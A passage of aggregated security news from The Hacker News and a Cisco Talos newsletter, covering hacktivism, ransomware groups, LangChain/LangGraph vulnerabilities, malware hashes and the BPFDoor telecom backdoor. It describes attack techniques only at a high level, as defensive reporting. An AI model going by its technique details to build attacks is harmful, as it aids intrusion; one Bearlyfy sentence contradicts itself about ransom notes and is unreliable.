We increasingly see boundaries between hackers, activists, and state actors dissolving. Groups such as NoName057(16) and Killnet operate independently, but in support of their host states, attacking adversarial governments and institutions while maintaining plausible deniability for their state beneficiaries.

Recent events illustrate the implications of this shift. Distributed-denial-of-service operations remain the most visible form of hacktivism, yet the targets and intent are changing. Campaigns by pro-Russian groups in 2025 disrupted British public services and European infrastructure, not for ransom or data theft but to broadcast political narratives and erode confidence in institutions ^[19]. In Norway, attackers remotely manipulated a valve at the Bremanger dam, prompting fears of cyber-physical escalation ^[20]. Around the same time, a Russian-aligned group claimed access to a water-utility system (though that later proved to be a security honeypot) ^[21].

More recently, Canadian authorities have reported that hacktivist groups breached critical infrastructure, including water, energy and agricultural sites [22]. The attacks involved tampering with pressure valves at a water facility, manipulating an automated tank gauge at an oil and gas company and exploiting temperature and humidity levels at a grain silo on a farm. The symbolism of these incidents is as potent as the technical impact, demonstrating reach into critical systems, even when the damage is contained, and catalyzes exactly the kind of panicked narratives the actors desire.

The risk is twofold. First, the risk of serious cyber-physical attacks is growing. While most hacktivist incidents remain low impact, the “addiction” of hacktivist groups to increased visibility and impact suggests they will continue to seek bigger and bolder opportunities. The growing familiarity of such groups with industrial and operational technology increases the likelihood of genuine harm. Attacks that were once digital graffiti could, by accident or intent, evolve into events with physical consequences. Second, the convergence of criminal, ideological, and state interests creates a synergy between information operations and infrastructure attacks. The target is no longer a single system but the public mind: to exhaust trust, polarize societies, and reshape narratives.

Cyber Extortion Is Still the Big Gorilla

20 March 2024: The Bundeskriminalamt (BKA, German Federal Criminal Police), together with Frankfurt’s ZIT cyber-unit, conducted a takedown of the darknet marketplace “Nemesis Market”, seizing infrastructure in Germany and Lithuania ^[23].
30 May 2024: Authorities participating in Operation ENDGAME announce arrests of four suspects in Ukraine and Armenia, the takedown of internet servers and control of domains tied to botnets ^[24].
December 2024: The Cl0p ransomware gang launched a major campaign exploiting a zero-day vulnerability in Cleo managed file-transfer software, leading to hundreds of victims ^[25].
14 January 2025: The UK Home Office publishes a consultation paper proposing a targeted ban on ransomware payments by all UK public sector bodies and critical national infrastructure and introducing mandatory incident-reporting for ransomware events ^[26].
19-22 May 2025: In the latest phase of Operation ENDGAME, law-enforcement agencies dismantle servers, neutralize domains, and issue arrest warrants for 20 suspects ^[27].
June 2025: A follow-up to Operation ENDGAME results in additional actions and detentions targeting successor groups and affiliates of initial-access ecosystems ^[28].
22 July 2025: The UK government announces its formal intention to ban public bodies from paying ransoms, and to legislate for mandatory reporting of incidents and payments ^[29].
11 August 2025: The US Department of Justice announces a coordinated disruption of the ransomware group BlackSuit (Royal), involving multiple countries ^[30].

Cyber extortion attacks have expanded to nearly every region and every size of business. Where large firms in developed economies previously dominated statistics, victims this year include firms in countries added to our extortion datasets for the first time.

The entry costs for attackers have plummeted thanks to the commoditization of malware-as-a-service, initial access brokers, and cryptocurrency-enabled monetization. A single vulnerability in commonly used software can yield hundreds or thousands of victims overnight, as seen when Cl0p exploited another file-transfer platform to trigger the largest wave of victims we’ve ever recorded ^[31].

Our data shows not only more victims, but also more actors. The victims-per-actor ratio has increased, suggesting that extortion groups are operating at a greater scale and with greater reuse of infrastructure.

We observe three key trends:

Despite years of focus and substantial investment in defensive controls, the number of victims continues to rise [32]. Ransomware and extortion attacks now represent a dominant share of cyber incidents, often accounting for more than a third of losses and exhibiting growth measured in multiples since the late 2010s ^[33].
The techniques used by threat actors are, in many cases, well-known, straightforward, and theoretically avoidable ^[34]. Phishing, stolen credentials, unpatched systems, and misconfigured file-transfer appliances feature prominently in breach post-mortems. Yet these attacks persist and succeed, even when the theoretical controls exist. This points to a deeper problem than individual technical weakness.
The ecosystem behind these attacks is evolving rapidly. Our reporting shows that the cyber extortion ecosystem has matured into a decentralized, professionalized network of affiliates, service-providers, and facilitators, using the lowest cost, highest leverage vectors available.

While we found that law enforcement and governments are responding more assertively, they must overcome jurisdictional fragmentation, safe-haven states, and an adversary that shifts shape and label constantly.

The fact that many of the techniques used in Cy-X compromises are “familiar, predictable and defeatable”, yet somehow remain effective, requires urgent reflection. The recent breach at a major aerospace company - in which attackers accessed a server with old credentials, stole data, and followed up with a second ransomware team on the same system - illustrates how basic processes can fail at multiple layers ^[35]. If we know how to patch, how to secure credential access, how to maintain offline backups, and how to train staff, then why do firms keep falling victim? The explanation may consider three broad theories.

Firstly, many organizations simply adopt security technologies or controls that are inexpensive, unwieldy, or poorly aligned with their context. The tools may be present in theory, but fail in practice. Secondly, maybe the adoption rate of basic cyber-hygiene practices remains patchy, especially among smaller firms and in developing economies. This leaves a wide attack surface still to be exploited. Finally, we may have placed too much faith in preventing breaches when today’s environment also demands robust detection, response, and recovery capabilities.

Several major jurisdictions now participate regularly in multinational takedowns, arrests, and indictments. However, despite the increased volume of actions, the Cy-X ecosystem remains resilient. Some states tolerate or even shield domestic cyber-criminals, creating safe havens that thwart global efforts ^[36]. The net effect is that law enforcement action alone, while necessary, cannot tip the balance without significantly improved coordination, sustained pressure, and the elimination of safe havens.

A wholly new form of collaboration is required that is more reminiscent of a wartime society, in which a mutual adversary and shared goals surface a unique and authentic form of public-private partnership.

Cyber extortion is not a niche threat that will fade. It is a systemic challenge that will continue to grow unless we change how we think, defend, respond and collaborate. We have the technical knowledge and the policy tools. The challenge is to achieve collective execution at scale, global coordination, and the political will to treat this threat as the societal hazard it has become.

Conclusion: Hacktivists, Criminals, and Everything in Between

Hacktivism and the cyber landscape in general arguably reflect the political moment now more than ever before. It mirrors a world where conflict is constant, boundaries are porous, and narratives are as contested as territory. For security leaders, this is no longer a technical nuisance to be filtered or patched away. It is a strategic threat that must be met with shared awareness, cross-sector coordination, and a recognition that cybersecurity is inseparable from societal security.

Clearly, every organization must assume it is a target and prepare accordingly. Prevention remains essential, but so too does resilience through detection, incident response and recovery. Table-top exercises, live-fire rehearsal of recovery from backup systems and transparent post-breach introspection must become standard business practice. But businesses cannot individually repel these implacable adversaries.

Defending against all classes of threats requires more than technical resilience, it demands a societal approach. Companies and governments must acknowledge that the target is often collective cohesion and confidence. Keeping a website online during a DDoS attack does not sufficiently address the wider objective of undermining civic or institutional legitimacy. Collaboration between public and private sectors must therefore extend beyond incident response into coordinated communication, education, and cognitive defense. The challenge is not only to secure systems but to preserve the coherence of the societies that depend on them.

This opinion piece was brought to you by Charl van der Walt, Head of Security Research at Orange Cyberdefense and uses excerpts and sources from the Security Navigator 2026. If you want to explore some of these topics in more depth, head over to the Navigator page and download your copy of the full report.

[1] https://ift.tt/A0tsyFX
[2] https://ift.tt/0mfRZvM
[3] https://ift.tt/bz4gRmW
[4] https://ift.tt/IxoCuz5
[5] https://ift.tt/Zw9QYuF
[6] https://ift.tt/nAMGU03
[7] https://ift.tt/WLbJI09
[8] https://ift.tt/6uVJIbp
[9] https://ift.tt/UDF4GMq
[10] https://ift.tt/F8fU7mz
[11] https://ift.tt/5KlZpND
[12] https://ift.tt/JPhDeq8
[13] https://ift.tt/YhmvfoT
[14] https://ift.tt/tmgviQk
[15] https://ift.tt/eNcry8O
[16] https://ift.tt/GChfQJt
[17] https://ift.tt/jlYs3pf
[18] https://ift.tt/rJaBNTZ
[19] https://ift.tt/I5QDHzF
[20] https://ift.tt/8291Mru
[21] https://ift.tt/Or6NzsM
[22] https://ift.tt/jlYs3pf
[23] https://ift.tt/QvqKX36
[24] https://ift.tt/VNrEdl1
[25] https://ift.tt/WLPDRhT
[26] https://ift.tt/B0e3rys
[27] https://ift.tt/5y8ZI7J
[28] https://ift.tt/3yYvaAF
[29] https://ift.tt/Jl2khtB
[30] https://ift.tt/TAdocPD
[31] https://ift.tt/LiY5o3V
[32] https://ift.tt/zcOA9qF
[33] https://ift.tt/Z8vHN2S
[34] https://ift.tt/gle4Yv2
[35] https://www.bankinfosecurity.com/more-collins-aerospace-hacking-fallout-a-29848
[36] https://ift.tt/7eskYyd

Note: This article was expertly written and contributed by Charl an der Walt, Head of Security Research at Orange Cyberdefense.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.

from The Hacker News https://ift.tt/GafC74Q
via IFTTT

Bearlyfy Hits 70+ Russian Firms with Custom GenieLocker Ransomware

A pro-Ukrainian group called Bearlyfy has been attributed to more than 70 cyber attacks targeting Russian companies since it first surfaced in the threat landscape in January 2025, with recent attacks leveraging a custom Windows ransomware strain codenamed GenieLocker.

"Bearlyfy (also known as Labubu) operates as a dual-purpose group aimed at inflicting maximum damage upon Russian businesses; its attacks serve the dual objectives of extortion for financial gain and acts of sabotage," Russian security vendor F6 said.

The hacking group was first documented by F6 in September 2025 as leveraging encryptors associated with LockBit 3 (Black) and Babuk, with early intrusions focusing on smaller companies before upping the ante and demanding ransoms to the tune of €80,000 (about $92,100). By August 2025, the group had claimed at least 30 victims.

Beginning May 2025, Bearlyfy actors also utilized a modified version of PolyVice, a ransomware family attributed to Vice Society (aka DEV-0832 or Vanilla Tempest), which has a history of delivering third-party lockers such as Hello Kitty, Zeppelin, RedAlert, and Rhysida ransomware in their attacks.

Further analysis of the threat actor's toolset and infrastructure uncovers overlaps with PhantomCore, another group that's assessed to be operating with Ukrainian interests in mind. It's known to attack Russian and Belarusian companies since 2022. Beyond PhantomCore, Bearlyfy is also said to have collaborated with Head Mare.

Attacks mounted by the group have obtained initial access through the exploitation of external services and vulnerable applications, followed by dropping tools like MeshAgent to facilitate remote access and enable encryption, destruction, or modification of data. In contrast, PhantomCore conducts APT-style campaigns, where reconnaissance, persistence, and data exfiltration take precedence.

"The group itself is distinguished by rapid-fire attacks characterized by minimal preparation and swift data encryption; another distinctive feature of these attacks is that ransom notes are not generated by the ransomware software itself, but are instead crafted directly by the attackers," F6 noted last year.

Bearlyfy's attacks have proven to be an illicit revenue generation stream. Per F6 data, about one in five victims opt to pay the ransom. The initial ransom demands from the adversary is said to have escalated further, reaching hundreds of thousands of dollars.

The most noteworthy shift in the threat actor's modus operandi is the use of a proprietary ransomware family called GenieLocker to target Windows endpoints since the start of March 2026. GenieLocker's encryption scheme is inspired by Venus/Trinity ransomware families.

One of the most distinctive traits of the ransomware attacks is that the ransom notes are automatically generated by the locker. Instead, the threat actors opt for their own methods to share the next steps with victims, either just sharing contact details or elaborate messages that seek to exert psychological pressure and force them into paying up.

"While in its early stages, Bearlyfy members demonstrated a lack of sophistication and were clearly experimenting with various techniques and toolsets, within the span of a single year, this group has evolved into a veritable nightmare for Russian businesses -- including major enterprises," F6 said.

from The Hacker News https://ift.tt/HTXr9t4
via IFTTT

LangChain, LangGraph Flaws Expose Files, Secrets, Databases in Widely Used AI Frameworks

Cybersecurity researchers have disclosed three security vulnerabilities impacting LangChain and LangGraph that, if successfully exploited, could expose filesystem data, environment secrets, and conversation history.

Both LangChain and LangGraph are open-source frameworks that are used to build applications powered by Large Language Models (LLMs). LangGraph is built on the foundations of LangChain for more sophisticated and non-linear agentic workflows. According to statistics on the Python Package Index (PyPI), LangChain, LangChain-Core, and LangGraph have been downloaded more than 52 million, 23 million, and 9 million times last week alone.

"Each vulnerability exposes a different class of enterprise data: filesystem files, environment secrets, and conversation history," Cyera security researcher Vladimir Tokarev said in a report published Thursday.

The issues, in a nutshell, offer three independent paths that an attacker can leverage to drain sensitive data from any enterprise LangChain deployment. Details of the vulnerabilities are as follows -

CVE-2026-34070 (CVSS score: 7.5) - A path traversal vulnerability in LangChain ("langchain_core/prompts/loading.py") that allows access to arbitrary files without any validation via its prompt-loading API by supplying a specially crafted prompt template.
CVE-2025-68664 (CVSS score: 9.3) - A deserialization of untrusted data vulnerability in LangChain that leaks API keys and environment secrets by passing as input a data structure that tricks the application into interpreting it as an already serialized LangChain object rather than regular user data.
CVE-2025-67644 (CVSS score: 7.3) - An SQL injection vulnerability in LangGraph SQLite checkpoint implementation that allows an attacker to manipulate SQL queries through metadata filter keys and run arbitrary SQL queries against the database.

Successful exploitation of the aforementioned flaws could allow an attacker to read sensitive files like Docker configurations, siphon sensitive secrets via prompt injection, and access conversation histories associated with sensitive workflows. It's worth noting that details of CVE-2025-68664 were also shared by Cyata in December 2025, giving it the cryptonym LangGrinch.

The vulnerabilities have been patched in the following versions -

CVE-2026-34070 - langchain-core >=1.2.22
CVE-2025-68664 - langchain-core 0.3.81 and 1.2.5
CVE-2025-67644 - langgraph-checkpoint-sqlite 3.0.1

The findings once again underscore how artificial intelligence (AI) plumbing is not immune to classic security vulnerabilities, potentially putting entire systems at risk.

The development comes days after a critical security flaw impacting Langflow (CVE-2026-33017, CVSS score: 9.3) has come under active exploitation within 20 hours of public disclosure, enabling attackers to exfiltrate sensitive data from developer environments.

Naveen Sunkavally, chief architect at Horizon3.ai, said the vulnerability shares the same root cause as CVE-2025-3248, and stems from unauthenticated endpoints executing arbitrary code. With threat actors moving quickly to exploit newly disclosed flaws, it's essential that users apply the patches as soon as possible for optimal protection.

"LangChain doesn't exist in isolation. It sits at the center of a massive dependency web that stretches across the AI stack. Hundreds of libraries wrap LangChain, extend it, or depend on it," Cyera said. "When a vulnerability exists in LangChain’s core, it doesn’t just affect direct users. It ripples outward through every downstream library, every wrapper, every integration that inherits the vulnerable code path."

from The Hacker News https://ift.tt/SVngJMr
via IFTTT

Thursday, March 26, 2026

A puppet made me cry and all I got was this t-shirt

Welcome to this week’s edition of the Threat Source newsletter.

Anyone who spoke with me in the last several weeks has had to deal with me loudly waiting in anticipation for the long-awaited “Project Hail Mary” movie adaptation. I read (and cried over) the book by Andy Weir, who’s also the author of “The Martian,” about a year ago and, shortly after, found out it was being made into a movie.

(I know what you’re thinking: Two movie-themed editions in two weeks? It’s every cinephile’s dream!)

Anyway, the story centers around a biologist and science teacher named Ryland Grace (Ryan Gosling), who wakes up from a coma on a spaceship lightyears away from Earth, his two crewmembers long dead. Our planet’s sun is slowly dimming, its energy being consumed by alien microbes called “astrophage” that are infecting all the stars in our stellar neighborhood — except one. Grace’s task is to figure out why this star is unaffected and send the solution back to Earth. It's a one-way trip, and he’ll eventually die in space alone... or so he thinks.

The movie met 99.9% of my expectations, which is rare for an adaptation. The humor was spot-on, the soundtrack was gorgeous, and the puppetry — yes, the puppetry (mild spoilers for Rocky, Grace’s new alien friend) — was out-of-this-world.

While it is a story about space, it’s first and foremost about communication, trust, and collaboration — things we’re no strangers to at Talos, especially when creating the Year in Review report (which is available now). The entire processof creating this report, from raw data to final design, is only a little bit less monumental than stopping alien microbes from plunging the earth into an ice age.

The process begins with Talos’ Strategic Analysis team, who leverage the vast amount of Cisco’s telemetry, Talos research, and data from Talos Incident Response cases to analyze trends over the past year. This analysis is synthesized into a comprehensive report, which undergoes rigorous review and proofing at multiple levels. While the report is being drafted, the Strategic Comms team develops a detailed schedule of content and collateral to promote it both internally and externally, meeting weekly to track our progress. Once the text is finalized, it moves to our design team, who transform the data into a visually stunning, accessible format. Even after the report launches, the work continues: We produce videos, answer your questions on Reddit (today only!), record podcasts, create social media graphics, and collaborate across Cisco to ensure our findings reach the right people.

We do this for the good of the community. Our report isn’t gated, and it never will be; you can read it right in your browser without filling out fake names and emails in annoying forms. Talos’ job is to keep as many people as safe as possible, and that means free access to critical information. Here's a taste of our findings:

React2Shell was the No. 1 most targeted CVE in 2025 despite only being discovered in December. ToolShell was No. 3 despite being released in June.
About 25% of the vulnerabilities on our top 100 list affect widely used frameworks and libraries, highlighting the risk of supply chain-style attacks.
Nearly a third of MFA spray attacks targeted identity and access management (IAM) applications.
Attackers continued to rely heavily on phishing for initial access, observed in 40% of Talos IR cases. 35% of cases involved internal phishing.
Qilin was the most seen ransomware variant in 2025, with over 40 victims each month except January.

We also offer insights on AI and state-sponsored threats, so be sure to view the full report.

In “Project Hail Mary,” Grace and his alien friend, Rocky, realize that they can't save their respective worlds alone. The Talos Year in Review is the result of a massive, cross-functional mission. It takes collaboration between all of Talos’ teams to turn complex, often daunting telemetry into actionable intelligence for the community.

When we share knowledge, communicate clearly, and work together, the results are, to quote Rocky, “Amaze! Amaze! Amaze!”

Stay tuned over the coming days and weeks as we break each section down into the most important 2025 Year in Review findings you need to know.

The one big thing

One of the main themes from the 2025 Year in Review's vulnerability data is that attackers are targeting identity by compromising the infrastructure that sits around it, including physical hardware devices, software, and management platforms. Network components act as de facto identity gateways, allowing adversaries to impersonate users, bypass MFA, and traverse networks undetected. Attackers overwhelmingly prefer high-access targets that require minimal exploitation steps and yield maximum operational payoff.

Why do I care?

Identity-centric network components act as control points for the entire environment, meaning their compromise can invalidate MFA, bypass segmentation, and grant immediate access to high-value resources. Network management platforms give adversaries direct access to privileged administrative functions, device credentials, and automation pipelines that touch hundreds of downstream systems. Compromising a single ADC or management platform can expose dozens of downstream systems, making these devices powerful force multipliers.

So now what?

Organizations should consider the impact on identity when prioritizing the patching of network devices. ADCs must be protected as identity control points, not merely performance appliances. Defenders should focus on these high-leverage vulnerability classes that enable identity compromise, policy manipulation, and infrastructure-wide escalation. Read the full Year in Review for more information.

Top security headlines of the week

U.S. Department of Energy publishes five-year energy security plan
The three goals are to develop ‘world-class’ security technologies, to harden the US energy infrastructure, and establish emergency preparedness for response and recovery from incidents. (SecurityWeek)

Someone has publicly leaked an exploit kit that can hack millions of iPhones
Researchers are warning that this will allow any hacker to easily use the tools to target iPhone users running older versions of Apple’s operating systems who have not yet updated to its latest iOS 26 software. (TechCrunch)

Checkmarx KICS code scanner targeted in widening supply chain hit
Specifically, the cybercriminals infiltrated KICS GitHub Action, which organizations use to run KICS scans within their CI/CD pipelines, and poisoned multiple versions of the software. (Dark Reading)

Attackers hide infostealer in copyright infringement notices
Aimed at organizations in critical sectors, including healthcare, government, hospitality, and education, it attempts to install PureLog Stealer, a low-cost infostealer easy for threat actors to use. (Dark Reading)

Oracle releases emergency patch for critical identity manager vulnerability
CVE-2026-21992 can be used without authentication for remote code execution and it may have been exploited in the wild. (SecurityWeek)

Can’t get enough Talos?

Today only: Ask us anything
Talos and Splunk researchers are standing by on Reddit to answer your questions about the Year in Review, Top 50 Cybersecurity Threats report, or just about anything else you want to know. It’s halfway over, so post your questions now!

Year in Review highlights
In 2025, attackers moved fast, but they also played the long game. This short video highlights the biggest trends from the 2025 Talos Year in Review and what they reveal about where the threat landscape is headed.

Gravy, glutes, and the Talos Year in Review
Hazel, Bill, Joe, and Dave discuss the 2025 Year in Review, supported as always by the Turkey Lurkey Man. We also discuss the cyber activity tied to the situation in the Middle East.

Cybersecurity’s double-header
With the recent release of the Year in Review and Splunk’s Top 50 Cybersecurity Threats report, Amy, Bill, and Lou break down the most critical trends that shaped the security landscape last year.

Upcoming events where you can find Talos

Botconf 2026 (April 15 – 17) Reims, France

Most prevalent malware files from Talos telemetry over the past week

SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
MD5: 2915b3f8b703eb744fc54c81f4a9c67f
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
Example Filename: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507.exe
Detection Name: Win.Worm.Coinminer::1201

SHA256: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974
MD5: aac3165ece2959f39ff98334618d10d9
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974
Example Filename: d4aa3e7010220ad1b458fac17039c274_63_Exe.exe
Detection Name: W32.Injector:Gen.21ie.1201

SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59
MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59
Example Filename: APQ9305.dll
Detection Name: Auto.90B145.282358.in02

SHA256: 5e6060df7e8114cb7b412260870efd1dc05979454bd907d8750c669ae6fcbcfe
MD5: a2cf85d22a54e26794cbc7be16840bb1
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=5e6060df7e8114cb7b412260870efd1dc05979454bd907d8750c669ae6fcbcfe
Example Filename: a2cf85d22a54e26794cbc7be16840bb1.exe
Detection Name: W32.5E6060DF7E-100.SBX.TG

SHA256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
MD5: 7bdbd180c081fa63ca94f9c22c457376
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
Example Filename: d4aa3e7010220ad1b458fac17039c274_62_Exe.exe
Detection Name: Win.Dropper.Miner::95.sbx.tg

SHA256: 38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55
MD5: 41444d7018601b599beac0c60ed1bf83
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55
Example Filename: 38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55.js
Detection Name: W32.38D053135D-95.SBX.TG

from Cisco Talos Blog https://ift.tt/NUeOGIf
via IFTTT

China-Linked Red Menshen Uses Stealthy BPFDoor Implants to Spy via Telecom Networks

A long-term and ongoing campaign attributed to a China-nexus threat actor has embedded itself in telecom networks to conduct espionage against government networks.

The strategic positioning activity, which involves implanting and maintaining stealthy access mechanisms within critical environments, has been attributed to Red Menshen, a threat cluster that's also tracked as Earth Bluecrow, DecisiveArchitect, and Red Dev 18. The group has a track record of striking telecom providers across the Middle East and Asia since at least 2021.

Rapid7 described the covert access mechanisms as "some of the stealthiest digital sleeper cells" ever encountered in telecommunications networks.

The campaign is characterized by the use of kernel-level implants, passive backdoors, credential-harvesting utilities, and cross-platform command frameworks, giving the threat actor the ability to persistently inhabit networks of interest. One of the most recognized tools in its malware arsenal is a Linux backdoor called BPFDoor.

"Unlike conventional malware, BPFdoor does not expose listening ports or maintain visible command-and-control channels," Rapid7 Labs said in a report shared with The Hacker News. "Instead, it abuses Berkeley Packet Filter (BPF) functionality to inspect network traffic directly inside the kernel, activating only when it receives a specifically crafted trigger packet."

"There is no persistent listener or obvious beaconing. The result is a hidden trapdoor embedded within the operating system itself."

The attack chains begin with the threat actor targeting internet-facing infrastructure and exposed edge services, such as VPN appliances, firewalls, and web-facing platforms associated with Ivanti, Cisco, Juniper Networks, Fortinet, VMware, Palo Alto Networks, and Apache Struts, to obtain initial access.

Upon gaining a successful foothold, Linux-compatible beacon frameworks such as CrossC2 are deployed to facilitate post-exploitation activities. Also dropped are Sliver, TinyShell (a Unix backdoor), keyloggers, and brute-force utilities to facilitate credential harvesting and lateral movement.

Central to Red Menshen's operations, however, is BPFDoor. It features two distinct components: One is a passive backdoor deployed on the compromised Linux system to inspect incoming traffic for a predefined "magic" packet by installing a BPF filter and spawning a remote shell upon receiving such a packet. The other integral part of the framework is a controller that's administered by the attacker and is responsible for sending the specially formatted packets.

"The controller is also designed to operate within the victim’s environment itself," Rapid7 explained. "In this mode, it can masquerade as legitimate system processes and trigger additional implants across internal hosts by sending activation packets or by opening a local listener to receive shell connections, effectively enabling controlled lateral movement between compromised systems."

What's more, certain BPFDoor artifacts have been found to support the Stream Control Transmission Protocol (SCTP), potentially enabling the adversary to monitor telecom-native protocols and gain visibility into subscriber behavior and location, and even track individuals of interest.

These aspects demonstrate that the functionality of BPFdoor goes beyond a stealthy Linux backdoor. "BPFdoor functions as an access layer embedded within the telecom backbone, providing long-term, low-noise visibility into critical network operations," the security vendor added.

It doesn't end there. A previously undocumented variant of BPFdoor incorporates architectural changes to make it more evasive and stay undetected for prolonged periods in modern enterprise and telecom environments. These include concealing the trigger packet within seemingly legitimate HTTPS traffic and introducing a novel parsing mechanism that ensures the string "9999" appears at a fixed byte offset within the request.

This camouflage, in turn, allows the magic packet to stay hidden inside HTTPS traffic and avoid causing shifts to the position of data inside the request, and allows the implant to always check for the marker at a specific byte offset and, if it's present, interpret it as the activation command.

The newly discovered sample also debuts a "lightweight communication mechanism" that uses the Internet Control Message Protocol (ICMP) for interacting between two infected hosts.

"These findings reflect a broader evolution in adversary tradecraft," Rapid7 said. "Attackers are embedding implants deeper into the computing stack — targeting operating system kernels and infrastructure platforms rather than relying solely on user-space malware."

"Telecom environments — combining bare-metal systems, virtualization layers, high-performance appliances, and containerized 4G/5G core components — provide ideal terrain for low-noise, long-term persistence. By blending into legitimate hardware services and container runtimes, implants can evade traditional endpoint monitoring and remain undetected for extended periods."

from The Hacker News https://ift.tt/nRkmG2u
via IFTTT

Pages